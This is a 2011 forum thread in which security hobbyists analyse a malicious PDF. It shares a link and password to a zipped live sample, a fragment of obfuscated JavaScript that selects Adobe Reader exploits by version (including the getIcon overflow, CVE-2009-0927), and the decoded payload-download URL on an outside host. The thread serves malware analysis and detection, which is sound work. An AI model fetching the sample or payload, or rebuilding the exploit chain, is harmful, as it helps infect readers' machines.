Another virus sample (Nov 21)

Discussion in 'Anti-Virus' started by Virus Guy, Nov 22, 2011.

  1. Virus Guy

    Virus Guy Guest

    http://www.fileden.com/files/2008/7/19/2010382/A3D33.ZIP

    I submitted this to VT yesterday (or was it Sunday?) where it got a 30%
    detection rate.

    Password is "a" (no quotes).

    It's a pdf file.

    I can't bring up VT right now, and confirmed by
    http://downorjustforme.com/virustotal.com

    virustotal.com seems to be down :(

    I've been seeing lots of problems with VT lately - anyone know why?
     
    Virus Guy, Nov 22, 2011
    #1
    1. Advertisements

  2. Real fun obfuscated JavaScript testing Adobe versions and then attempting exploits...

    if((lv==9)||((sv==8)&&(lv<=8.12)))
    {
    geticon();
    }
    else if(lv==7.1)
    {
    printf();
    }
    else if(((sv==6)||(sv==7))&&(lv<7.11))
    {
    bx();
    }
    else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17))
    {
    function a()
    {
    util.printd('p@111111111111111111111111 : yyyy111',new Date());
    }
    var h=app.plugIns;
    for(var f=0;f<h.length;f++)
    {
    if(h[f].name=='EScript')
    {
    var i=h[f].version;
    }
    }
    if((i>8.12)&&(i<8.2))


    Payload...
    asjdha903.co.cc/w.php?f=20&e=5

    I couldn't get it. asjdha903.co.cc resolved to; 10.10.10.10
    but isn't that a Private Address scheme and if it is, maybe it was DNS Poisoned for non
    resolution.
     
    David H. Lipman, Nov 23, 2011
    #2
    1. Advertisements

  3. Do you have something that does "Flatedecode" for you, or are these
    sandbox results?

    Odd looking stuff.
     
    FromTheRafters, Nov 23, 2011
    #3
  4. Virus Guy

    Virus Guy Guest

    Hmmm.

    See also:

    http://jsunpack.jeek.org/dec/go/?list=1&search=CVE-2010-0249

    (note the on-line JS decoder)
     
    Virus Guy, Nov 23, 2011
    #4
  5. Flat decode from Obfuscated JaavScript to deobfuscated JavaScript to UCS2 coded segment to
    hex of decoded segment to shellcode analysis to get payload URL.
     
    David H. Lipman, Nov 23, 2011
    #5

  6. JSunpack does not do well on this PDF at all (sorry Blake)

    The PDF uses multiple exploits including the vulnerability associated with an Adobe
    getIcon() buffer overflow condition.
    Reference: CVE-2009-0927
     
    David H. Lipman, Nov 23, 2011
    #6
  7. Thanks Ant. I had never seen the name "Flatedecode" before and just
    figured it was yet another layer of obfuscation that when reversed would
    reveal the eval buried in that string and remove junk from the data it
    would eventually evaluate.
     
    FromTheRafters, Nov 23, 2011
    #7
  8. LOL. Ithought that was a spelling error and you were writing "Flat decode" ;-)
     
    David H. Lipman, Nov 24, 2011
    #8
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.